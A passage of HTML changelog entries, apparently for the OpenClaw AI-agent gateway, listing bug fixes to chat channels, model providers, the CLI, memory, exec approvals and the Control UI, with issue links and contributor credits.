<li>Slack/messages: cap Block Kit fallback text on message edits while preserving the rendered blocks, so long context fallbacks no longer make Slack reject <code>chat.update</code> calls with <code>msg_too_long</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>.</li>
<li>Channels/WhatsApp: require Baileys outbound message ids before marking auto-replies delivered, so transcript text and ack reactions no longer make failed group replies look sent. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4090958823" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49225" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49225/hovercard" href="https://github.com/openclaw/openclaw/issues/49225">#49225</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>.</li>
<li>CLI/update: scope packaged Node compile caches by OpenClaw version and install metadata, so global installs no longer reuse stale compiled chunks after package updates. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Channels/Voice call: keep pre-auth webhook in-flight limiting active when socket remote address metadata is missing, so slow-body requests from stripped-IP proxy paths still share the fallback bucket. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351826007" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74453" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74453/hovercard" href="https://github.com/openclaw/openclaw/pull/74453">#74453</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</li>
<li>Plugin SDK/testing: lazy-load TypeScript from the plugin test-contract runtime and add release checks for critical SDK contract entrypoint imports and bundle size, so published packages fail preflight before shipping ESM-incompatible or oversized contract helpers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels/Microsoft Teams: treat configured <code>19:...@thread.tacv2</code> and legacy <code>19:...@thread.skype</code> team/channel IDs as already resolved during startup, avoiding false <code>channels unresolved</code> warnings while preserving Graph name lookup for display-name entries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354343671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74683" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74683/hovercard" href="https://github.com/openclaw/openclaw/issues/74683">#74683</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dseravalli/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dseravalli">@dseravalli</a>.</li>
<li>CLI/browser: preserve parent flags while lazy-loading browser subcommands, so <code>openclaw browser --json open</code> and <code>openclaw browser --json tabs</code> keep machine-readable output after reparsing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353127836" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74574" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74574/hovercard" href="https://github.com/openclaw/openclaw/issues/74574">#74574</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/devintegeritsm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/devintegeritsm">@devintegeritsm</a>.</li>
<li>Exec/elevated: preserve <code>turnSourceChannel</code> as <code>messageProvider</code> on approval-followup runs so <code>tools.elevated.allowFrom.&lt;provider&gt;</code> checks no longer fail with <code>provider=null</code> after the user approves an async elevated command. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354035233" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74646" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74646/hovercard" href="https://github.com/openclaw/openclaw/issues/74646">#74646</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xhd2015/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xhd2015">@xhd2015</a>.</li>
<li>Plugins/runtime-deps: add <code>openclaw plugins deps</code> inspection and repair with script-free package-manager defaults shared across plugin installers, so operators can repair missing bundled runtime deps without corrupting JSON output or blocking unrelated conflict-free deps. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/output: strip internal <code>[tool calls omitted]</code> replay placeholders from user-facing replies while preserving visible reply whitespace. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353111354" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74573" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74573/hovercard" href="https://github.com/openclaw/openclaw/issues/74573">#74573</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/blaspat/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/blaspat">@blaspat</a>.</li>
<li>Providers/Google Vertex: route authorized_user ADC credentials through OpenClaw's REST transport so Docker installs using gcloud application-default credentials no longer crash in the Google SDK before requests are sent. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353780535" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74628" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74628/hovercard" href="https://github.com/openclaw/openclaw/issues/74628">#74628</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankhal2001-design/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankhal2001-design">@frankhal2001-design</a>.</li>
<li>ACP/resolver: fall through to thread-bound session resolution when an explicit <code>--session</code> token cannot be resolved while preserving the bad-token diagnostic when no thread binding exists, so Discord slash commands that auto-fill the current thread ID as the positional ACP target no longer return "Unable to resolve session target" errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259261328" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66299" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66299/hovercard" href="https://github.com/openclaw/openclaw/issues/66299">#66299</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kindomLee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kindomLee">@kindomLee</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Agents/sessions: emit a terminal lifecycle backstop when embedded timeout/error turns return without <code>agent_end</code>, so Gateway sessions no longer stay stuck in <code>running</code> after failover surfaces a timeout. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353527154" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74607" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74607/hovercard" href="https://github.com/openclaw/openclaw/issues/74607">#74607</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/millerc79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/millerc79">@millerc79</a>.</li>
<li>Gateway/diagnostics: include stuck-session reason hints and recovery skip causes in warnings, so operators can tell whether a lane is waiting on active work, queued work, or stale bookkeeping. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/Codex: bound embedded-run cleanup, trajectory flushing, and command-lane task timeouts after runtime failures, so Discord and other chat sessions return to idle instead of staying stuck in processing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Heartbeat/exec: consume successful metadata-only async exec completions silently so Telegram and other chat surfaces no longer ask users for missing command logs after <code>No session found</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353366864" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74595" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74595/hovercard" href="https://github.com/openclaw/openclaw/issues/74595">#74595</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gkoch02/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gkoch02">@gkoch02</a>.</li>
<li>Web fetch: add a documented <code>tools.web.fetch.ssrfPolicy.allowIpv6UniqueLocalRange</code> opt-in and thread it through cache keys and DNS/IP checks so trusted fake-IP proxy stacks using <code>fc00::/7</code> can work without broad private-network access. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350890451" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74351" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74351/hovercard" href="https://github.com/openclaw/openclaw/issues/74351">#74351</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeffrey701/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeffrey701">@jeffrey701</a>.</li>
<li>OpenAI Codex: restore <code>/verbose full</code> persistence and app-server tool-output forwarding, and retry Gateway E2E temp-home cleanup so debug runs do not regress on stale validation or cleanup flakes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Anthropic/Meridian: preserve text and thinking content seeded on <code>content_block_start</code> in anthropic-messages streams, so <code>[thinking, text]</code> replies no longer persist as empty turns or trigger empty-response fallbacks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351435288" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74410" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74410/hovercard" href="https://github.com/openclaw/openclaw/issues/74410">#74410</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vyctorbrzezowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vyctorbrzezowski">@vyctorbrzezowski</a>.</li>
<li>Channels/Matrix: complete the cross-signing handshake on <code>openclaw matrix verify confirm-sas</code> so the operator's other Matrix device clears its <code>Verifying…</code> loop instead of staying stuck after the agent confirms. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352761902" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74542" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74542/hovercard" href="https://github.com/openclaw/openclaw/pull/74542">#74542</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nklock/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nklock">@nklock</a>.</li>
<li>CLI/status: honor channel-specific model context-window overrides when reporting effective context, so channel-scoped sessions reflect the active window in <code>openclaw status</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>.</li>
<li>Sandbox/Docker: tolerate Docker daemon unavailability when sandbox mode is off, so doctor and preflight checks no longer fail on installs that do not run the Docker daemon. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344707479" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73671" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73671/hovercard" href="https://github.com/openclaw/openclaw/pull/73671">#73671</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kaseonedge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kaseonedge">@kaseonedge</a>.</li>
<li>Control UI/mobile: persist mobile chat settings through Lit-managed state and route mobile navigation through the same view-state path so chat panel toggles survive transitions on small viewports. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Control UI/exports: align sidebar trigger affordances across the resizable divider, mobile layout, and exported-HTML transcript template so the sidebar toggle and exported transcript sidebar render with consistent hit areas and styling. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Control UI/chat: disable the page refresh affordance while a chat run is active so accidental refreshes do not abort an in-flight reply. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Angfr95/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Angfr95">@Angfr95</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Memory/LanceDB: return real memory records from <code>openclaw ltm list</code> (with optional <code>--limit</code> and createdAt ordering) instead of an empty placeholder, so the CLI surface matches the documented LTM listing contract. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279969994" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67952" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67952/hovercard" href="https://github.com/openclaw/openclaw/pull/67952">#67952</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangyue19921010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangyue19921010">@zhangyue19921010</a>.</li>
<li>Media: include redacted per-attempt resize failures and resolved model input capabilities in vision-pipeline errors so ARM64 image failures are diagnosable without closing the remaining routing investigation. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352922423" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74552" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74552/hovercard" href="https://github.com/openclaw/openclaw/issues/74552">#74552</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1yihui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1yihui">@1yihui</a>.</li>
<li>Control UI/i18n: route zh-CN agent, debug, channel-refresh, and exec-approval copy through the locale source while preserving the English <code>Cron Jobs</code> agent tab label and the security-audit command styling. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040969776" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39692" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/39692/hovercard" href="https://github.com/openclaw/openclaw/pull/39692">#39692</a> repair context. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hepeng154833488/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hepeng154833488">@hepeng154833488</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Auto-reply: honor explicit <code>silentReply.direct: "allow"</code> for clean empty or reasoning-only direct chat turns while keeping the default direct-chat empty-response guard conservative. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351432589" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74409" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74409/hovercard" href="https://github.com/openclaw/openclaw/issues/74409">#74409</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesuskannolis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesuskannolis">@jesuskannolis</a>.</li>
<li>OpenAI Codex: send a non-empty Responses input item when a Codex turn only has systemPrompt-backed instructions, avoiding ChatGPT backend 400s from <code>input: []</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346425036" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73820" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73820/hovercard" href="https://github.com/openclaw/openclaw/issues/73820">#73820</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/woodhouse-bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/woodhouse-bot">@woodhouse-bot</a>.</li>
<li>Ollama: normalize provider-prefixed tool-call names at the native stream boundary so Kimi/Ollama calls such as <code>functions.exec</code> dispatch as <code>exec</code> instead of missing configured tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352343792" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74487" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74487/hovercard" href="https://github.com/openclaw/openclaw/issues/74487">#74487</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/afurm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/afurm">@afurm</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/carreipeia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/carreipeia">@carreipeia</a>.</li>
<li>Security/audit: resolve configured model aliases before model-tier and small-parameter checks, so alias-based GPT-5/Codex configs no longer report false weak-model warnings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351877071" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74455" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74455/hovercard" href="https://github.com/openclaw/openclaw/issues/74455">#74455</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/blaspat/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/blaspat">@blaspat</a>.</li>
<li>CLI/agent: isolate Gateway-timeout embedded fallback runs under explicit <code>gateway-fallback-*</code> sessions so accepted Gateway runs cannot race transcript locks or replace the routed conversation session. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4222569416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62981" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62981/hovercard" href="https://github.com/openclaw/openclaw/issues/62981">#62981</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>.</li>
<li>CLI/QR/device-pair: reject malformed public setup URLs before issuing mobile pairing bootstrap tokens, while keeping valid bare host:port setup URLs supported. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</li>
<li>Models/UI: hide unauthenticated providers from the default Web chat, <code>/models</code>, and model setup pickers while keeping explicit full-catalog browse paths through <code>view: "all"</code>, <code>/models &lt;provider&gt; all</code>, and <code>models list --all</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351540119" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74423" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74423/hovercard" href="https://github.com/openclaw/openclaw/issues/74423">#74423</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/guarismo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/guarismo">@guarismo</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Ollama: keep explicit local model runs on target-provider runtime hooks when PI discovery is skipped, so one-shot Ollama calls no longer cold-load unrelated provider runtimes before streaming. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347954374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74078" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74078/hovercard" href="https://github.com/openclaw/openclaw/issues/74078">#74078</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sakalaboator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sakalaboator">@sakalaboator</a>.</li>
<li>Slack/prompts: rely on Slack <code>interactiveReplies</code> guidance instead of generic <code>inlineButtons</code> config hints so enabled Slack button directives are not contradicted. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077041050" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46647" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46647/hovercard" href="https://github.com/openclaw/openclaw/issues/46647">#46647</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeremykoerber/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeremykoerber">@jeremykoerber</a>.</li>
<li>Slack/reactions: treat duplicate <code>already_reacted</code> responses as idempotent success so repeated agent reaction adds no longer surface as tool failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291287868" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69005" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69005/hovercard" href="https://github.com/openclaw/openclaw/issues/69005">#69005</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shipitsteven/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shipitsteven">@shipitsteven</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Channels/Discord: cool down Cloudflare/Error 1015 HTML 429 REST failures during startup application lookup and gateway metadata fetches, add <code>channels.discord.applicationId</code> as an app-id lookup bypass, sanitize HTML bodies before logging, and honor Retry-After before falling back to a conservative cooldown. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4038404026" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38853" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38853/hovercard" href="https://github.com/openclaw/openclaw/issues/38853">#38853</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352352572" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74489" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74489/hovercard" href="https://github.com/openclaw/openclaw/pull/74489">#74489</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/djgeorg3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/djgeorg3">@djgeorg3</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Garyko0730/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Garyko0730">@Garyko0730</a>.</li>
<li>Slack/tools: expose <code>fileId</code> in the shared message tool schema so <code>download-file</code> can receive Slack attachment IDs from inbound placeholders. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4074134594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45574" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45574/hovercard" href="https://github.com/openclaw/openclaw/issues/45574">#45574</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chadvegas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chadvegas">@chadvegas</a>.</li>
<li>Exec: reject invalid per-call <code>host</code> values instead of silently falling back to the default target, so hostname-like values fail before commands run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351549756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74426" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74426/hovercard" href="https://github.com/openclaw/openclaw/issues/74426">#74426</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scr00ge-00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scr00ge-00">@scr00ge-00</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vyctorbrzezowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vyctorbrzezowski">@vyctorbrzezowski</a>.</li>
<li>Google/Gemini: send non-empty placeholder content when a Gemini run is triggered with empty or filtered user content, avoiding <code>contents is not specified</code> API errors. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CaoYuhaoCarl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CaoYuhaoCarl">@CaoYuhaoCarl</a>.</li>
<li>Heartbeat: preserve non-task <code>HEARTBEAT.md</code> context around <code>tasks:</code> blocks and apply <code>agents.defaults.heartbeat</code> to all agents unless per-agent heartbeat entries restrict scope. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sekhar03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sekhar03">@Sekhar03</a>.</li>
<li>Markdown: preserve paragraph breaks inside loose list items in shared outbound formatting while keeping tight list spacing stable. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</li>
<li>Build/Gateway: route restart, shutdown, respawn, diagnostics, command-queue cleanup, and runtime cleanup through one stable gateway lifecycle runtime entry so rebuilt packages do not strand long-running gateways on stale hashed chunks. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347423967" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73964" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73964/hovercard" href="https://github.com/openclaw/openclaw/pull/73964">#73964</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Memory/wiki: keep broad shared-source and generated related-link blocks from turning every page into a search hit, cap noisy backlinks, support all-term searches such as people-routing queries, and prefer readable page body snippets over generated metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Cron/Gateway: abort and bounded-clean up timed-out isolated agent turns before recording the timeout, so stale cron sessions cannot leave Discord or other chat lanes stuck in <code>processing</code> after a timeout. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
